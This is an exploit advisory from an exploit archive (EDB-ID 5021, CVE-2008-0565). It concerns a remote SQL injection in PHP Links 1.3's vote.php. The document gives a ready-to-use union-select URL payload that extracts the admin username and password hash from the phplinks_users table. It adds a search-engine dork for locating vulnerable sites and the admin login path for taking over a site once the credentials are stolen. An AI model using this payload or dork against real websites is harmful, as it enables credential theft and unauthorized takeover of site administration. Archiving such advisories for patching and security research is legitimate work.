PHP Links <= 1.3 vote.php id Remote SQL Injection Vulnerability

2008-01-30T00:00:00
ID EDB-ID:5021
Type exploitdb
Reporter Houssamix
Modified 2008-01-30T00:00:00

Description

PHP Links <= 1.3 (vote.php id) Remote SQL Injection Vulnerability. CVE-2008-0565. Webapps exploit for php platform

                                        
                                            -------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo --------
-------------------------------------------------------------

= Author : Houssamix From H-T Team                          
= Script : PHP Links from DeltaScripts &lt;= 1.3         
                     
        
= Download : http://softadmin.deltascripts.com/download.php
             (PHP Links v1.3 Released 13.09.2007 ) 			 
           
= BUG :  Remote SQL Injection Vulnerability  

= Dork : Powered by PHP Links from DeltaScripts              

= Exploit :                                                  
vote.php?id=-1%20union%20select%20concat(user_name,0x3a,user_pass),2,3,4,5,6%20from%20phplinks_users%20where%20user_id=1--

= Note : admin login http://Target/path/admin/           

-------------------------------------------------------------
= Greetz : CoNaN - Stack-Terrorist - Gold_M - Rachidox
-------------------------------------------------------------

# milw0rm.com [2008-01-30]